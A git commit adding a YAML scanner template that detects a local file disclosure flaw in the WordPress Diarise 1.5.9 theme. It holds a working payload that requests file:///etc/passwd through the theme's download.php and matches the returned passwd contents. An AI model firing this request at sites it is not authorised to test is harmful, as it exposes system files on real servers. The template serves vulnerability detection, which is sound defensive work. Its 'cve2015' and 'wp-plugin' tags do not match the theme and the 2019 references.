Create wp-theme-diarise-lfi.yaml

patch-1
Roberto Nunes 2021-10-31 06:44:13 +09:00 committed by GitHub
parent 035f829d69
commit 6bb885956e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 26 additions and 0 deletions

26
wp-theme-diarise-lfi.yaml Normal file
View File

@ -0,0 +1,26 @@
id: wp-theme-diarise-lfi
info:
name: WordPress Diarise 1.5.9 Local File Disclosure
author: 0x_Akoko
severity: high
description: WordPress Diarise theme version 1.5.9 suffers from a local file disclosure vulnerability.
reference:
- https://packetstormsecurity.com/files/152773/WordPress-Diarise-1.5.9-Local-File-Disclosure.html
- https://cxsecurity.com/issue/WLB-2019050123
tags: cve,cve2015,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/themes/diarise/download.php?calendar=file:///etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200